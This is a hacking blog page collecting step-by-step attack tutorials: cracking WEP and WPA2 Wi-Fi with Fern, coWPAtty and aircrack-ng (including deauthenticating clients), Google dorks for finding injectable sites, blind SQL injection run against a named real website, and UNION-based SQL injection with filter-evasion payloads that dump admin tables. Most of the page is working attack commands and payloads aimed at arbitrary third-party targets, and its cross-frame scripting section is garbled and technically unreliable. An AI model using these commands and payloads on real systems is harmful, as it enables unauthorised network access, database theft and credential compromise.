Welcome Fellow Hacker!

Linggo, Mayo 4, 2014

How to Hack WPA/WPA2SK using FERN WIFI CRACKER

Automation Using the Fern WiFi Cracker

Just so you know, I still prefer and recommend you study the other methods to crack WEP as well, by using airodump, aireplay, and aircrack.
Why? Because in order to be a good network security professional, you need to KNOW how this stuff works. It’s not enough to be able to click a few buttons. We call those people keyboard jockies or tool monkeys.)  Understand what’s going on under the surface. WiFi hacking software  comes and goes, but aircrack, airodump, and aireplay have been around for a long time. They’re all quality products and you should know how each of these three tools works and how they can be used in conjunction with one another for a successful WiFi crack. The Fern WiFi cracker is an example of some fairly new WiFi hacking software that’s worth it.
Fern is a great WiFi cracker to use in a pinch and it’s already included in Back Track and Kali Linux. However, you can download Fern’s source code right here. We can use Fern to do a WiFi crack against a WEP encrypted network. Start by launching Fern from the Applications menu button at the top-left corner of the screen.
wifi hacking software  If you’re running Kali Linux:
-Select Applications -> Kali Linux -> Wireless Attacks -> Wireless Tools
If you’re running Back Track:
-Select Applications -> Back Track -> Exploitation Tools -> Wireless Exploitation Tools ->   WLAN Exploitation

Launch the Fern WiFi Cracker and Crack WEP

From the menu, click Fern-wifi-cracker to launch the tool.
crack wep










You should already have your wireless card in monitor mode. If not see my previous article right now.
crack wep

Click the drop down menu at the top of Fern and select your wireless adapter from this list. Click OK to any message boxes you get. After a few moments, the message Monitor Mode Enabled on… should appear in green as seen in the image.
Then click Scan for Access Points.
Fern will scan for WiFi networks in range, and will begin populating the WEP and WPA boxes.

cracking wep

Once the the Fern WiFi Cracker finishes scanning for networks, you can select the network you are targeting by finding it in either the  WEP section or the WPA section. In this example, I am targeting a WEP encrypted network with an SSID of Hack-WiFi.



wifi crack

You will have to select your target network from the drop down box and then clicking the WiFi Attack button to the right. 
hack wep







The Fern WiFi Cracker will now begin an automated WEP crack against the hack-wifi network. This may take some time, so if you need to get some coffee or take a dump, go for it. You’ll have a Please Wait… screen for a long time, as Fern goes through the process. Remember, Fern is completely automated WiFi hacking
wep cracker
software, so there isn’t anything left to do at this point than to just allow Fern to sniff the WiFi network, authenticate to the device, begin injecting replay traffic, and finally to crack WEP.
In my case, the Fern WiFi cracker didn’t succeed until it captured about 25,000 IVs.
But finally, if everything worked as it should, you’ll get the message below:
Congratulations! Another successful audit of a wireless network! As always, be sure to confirm you can connect to the target WiFi network.
wep broken
No comments

Hacking WPA/WPA2SK Wireless Network using COWPATTY

As part of my series on hacking Wi-Fi, I want to demonstrate another excellent piece of hacking software for cracking WPA2-PSK passwords. In my last post, we cracked WPA2 using aircrack-ng. In this tutorial, we'll use a piece of software developed by wireless security researcher Joshua Wright called cowpatty (often stylized as coWPAtty). This app simplifies and speeds up the dictionary/hybrid attack against WPA2 passwords, so let's get to it!

Step 1: Find the Cowpatty

Cowpatty is one of the hundreds of pieces of software that are included in the BackTrack suite of software. For some reason, it was not placed in the /pentest/wireless directory, but instead was left in the /usr/local/bin directory, so let's navigate there.
  • cd /usr/local/bin
Because cowpatty is in the /usr/local/bin directory and this directory should be in your PATH, we should be able to run it from any directory in BackTrack.

Step 2: Find the Cowpatty Help Screen

To get a brief rundown of the cowpatty options, simply type:
  • cowpatty
BackTrack will provide you a brief help screen. Take a note that cowpatty requires all of the following.
  • a word list
  • a file where the password hash has been captured
  • the SSID of the target AP

Step 3: Place the Wireless Adapter in Monitor Mode

Just as in cracking with aircrack-ng, we need to put the wireless adapter into monitor mode.
  • airmon-ng start wlan0

Step 4: Start a Capture File

Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0
This will start a dump on the selected AP (00:25:9C:97:4F:48), on the selected channel (-c 9) and save the the hash in a file named cowcrack.

Step 5: Capture the Handshake

Now when someone connects to the AP, we'll capture the hash and airdump-ng will show us it has been captured in the upper right-hand corner.

Step 6: Run the Cowpatty

Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
As you can see in the screenshot above, cowpatty is generating a hash of every word on our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it dsplays the password of the AP.

Step 7: Make Your Own Hash

Although running cowpatty can be rather simple, it can also be very slow. The password hash is hashed with SHA1 with a seed of the SSID. This means that the same password on different SSIDs will generate different hashes. This prevents us from simply using a rainbow table against all APs. Cowpatty must take the password list you provide and compute the hash with the SSID for each word. This is very CPU intensive and slow.
Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password 1000x faster! Pre-computed hash files are available from the Church of WiFi, and these pre-computed hash files are generated using 172,000 dictionary file and the 1,000 most popular SSIDs. As useful as this is, if your SSID is not in that 1,000, the hash list really doesn't help us.
In that case, we need to generate our own hashes for our target SSID. We can do this by using an application called genpmk. We can generate our hash file for the "darkcode" wordlist for the SSID "Mandela2" by typing:
  • genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Step 8: Using Our Hash

Once we have generated our hashes for the particular SSIDs, we can then crack the password with cowpatty by typing:
  • cowpatty -d hashfile -r dumpfile -s ssid
No comments

How to Crack WPA/WPA2PSK Wireless Connection using Aircrack

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.
As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter*
As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack named darkcOde.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlist/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.

Stay Tuned for More Wireless Hacking Guides

Keep coming back, as I promise more advanced methods of hacking wireless in future tutorials. If you haven't seen the other Wi-Fi hacking guides yet, check them out here. Particularly the one on hacking WEP using aircrack-ng and hacking WPA2-PSK passwords using coWPAtty.
And as always, if you have questions on any of this, please ask away in the comments below.
No comments

XFS Tutorial (CROSSFRAMESCRIPTING)



XFS - Cross Frame Scripting

Definition:

The frame which is vulnerable to Hackers to edit Source hence to Destroy it Structure partially or fully .

Types of XFS :


  • temporary
  • permanent ( rare )

temporary

in this type of vulnerable the user can only take control over only his side with a normal redirect ( works only for tester ) (the url remains same )

Permanent :

in this type the vulnerable will come via url and it is visible in every part of world until unless the vulnerable is fixed .



Finding vulnerable :

the vulnerable revolves around the site with many Iframe's . So you need choose the website wisely . do not choose if Iframe's is coded in complete pure html . every thing else works !

Things needed :

1)Firefox

FireFox is the best browser for hacker .

2) Tamper Data Addon

A addon for firefox which Catches GET's And POST's which are most important in XFS .

3) A brain

Huh > you have it right ?

4) Cookie Manager/Editor Addon

exploiting :
the Formula Must should be :

home page --> sub link --> iframe

Lets take a Example as " chrome download page " ( just a Example no XFS exists )

i.e :

PHP Code:
https://www.google.com/intl/en/chrome/browser/ 

Open up Tamper data In Firefox :

After that , Now Click Start tamper !

Click the sub link which will Direct you to a direct IFrame .

Take a note Pad And write Down all the Commands listed in tamper data

i.e Example :
PHP Code:
12x GET's

5x POST'

now make sure it has 1-5 POST's and reaming are all GET's

Now , Go back from browser And click again now make Sure you leave All the GET's And when Ever you got a POST Command edit all the fields to
PHP Code:
XFS 

Now you need to do minor Editing in the url to check its weather XFS or not .

lets try it out :

PHP Code:
x.com/thread-01/view;POST1
Result
:Same as Original

x
.com/thread-01/view;POST2
Result
Same as Original
x
.com/thread-01/view;POST3
Result
Same as Original

x
.com/thread-01/view;POST4
Result
Same as Original

x
.com/thread-01/view;POST5
Result
Broken I Frame we got it !!) 

Viola! we got it .

Now edit the cookie of that page with cookie Manager ! Set it to "
POST5 "

Now reload page and see the result is same or not .

its same We got it right !

Now If you want to Redirect use as follows code

PHP Code:
x.com/thread-01/view;POST5;redir.php?=www.google.com 

And if you want to popup use this code

PHP Code:
x.com/thread-01/view;POST5;alert("XFS")
No comments

Using and Creating SQL DORKS

A method of finding websites vulnerable to SQL injection is using what we call "dorks"
Dorks:They are like search criteria in which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks


For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.




Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-
Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-
Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'
Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google

Here's what you do:
  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
In your mouse, there should be a scroll button right?
Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)


Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this
Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

To determine if a website is vulnerable or not, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection
No comments

Hack Website using Blind SQL INJECTION



S0.6 - Blind SQL Injection


Let me start of by saying, blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Lets get started anyway. I found a site which I could use union based injection on so I wouldn't have to guess the table names, which made this tutorial alot easier to write.

First of all we will want to find a site using dorks, mentioned erlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based, i'll make a tutorial for that soon).
When we have our site, with a vulnerable parameter, you will want to test if it is vulnerable. We can do this by adding "and 1=1" onto the end of our url, and if it loads normally then thats good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.


Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
< no error
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
< doesn't load properly

It does this because you're either providing a true or false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version we will want to use

Code:
and substring(@@version,1,1)=VERSIONHERE

Where we have "VERSIONHERE", you will want to put the version there. Most sites would either use 4 or 5. Using what i said erlier, if the version is false, it won't load correctly. If it is true, it will.

Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
< loads fine

So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info as we would in a union based injection.
Now to find the tables we will have to guess the names. Since union based injection works on the site I'm using as an example as, I just quickly got the tables/columns doing it that way to make the tutorial simple. But otherwise you would have to guess it. You could use common table names such as admin, user, login etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".

Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test2 limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from chapters limit 0,1)=1
< page loads fine. so there is a table named chapters.

Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,

Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
< loads fine. There is a column named category.

After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one in ascii. So "test" = "74 65 73 74". You can find an ascii chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the hackbar addon for firefox. Or use this - http://easycalculation.com/ascii-hex.php.

We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
should load normally. because most sited wouldn't allow "@" in the username, but it's possible. @ = 64 in ascii. Since it loads normally you know it is greater than 64.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
will load normally, because the "j" in john = 106 in ascii.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
will return an error, because "j" is not greater than 106. It is 106. It's like finding columns really. So after we know it is 106 in ascii, we write that down. 106 = j.

Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
will load normally, because the "o" in john is greater than 110. It's 111. So

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>111
will return an error because o is equal to 111, not greater. But since you get nothing at 110, you know it's 111. So now you have the first two characters, just keep repeating this untill you get an error no matter what, then you will know that you have the full username. Then after you have done that move to a different column, such as password :). Like I said this can be really time consuming, this is probabally one of the only times I'd use a tool personally.





Resources.

http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves alot of time.
http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP
http://www.string-functions.com/string-hex.aspx - String to hexdecimal converter.
No comments

Hack Website using SQL INJECTION WAF BYPAS

Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:



Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 ​7,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you would like to do now is you use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 ​7,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 ​0,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 ​0,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part; lets try to find all the databases, here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 ​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 ​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ​,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ​,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

it's the same to get columns, you know the drill.

If you now want to dump columns id from admin table you do like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ​ ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 ​2,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless
No comments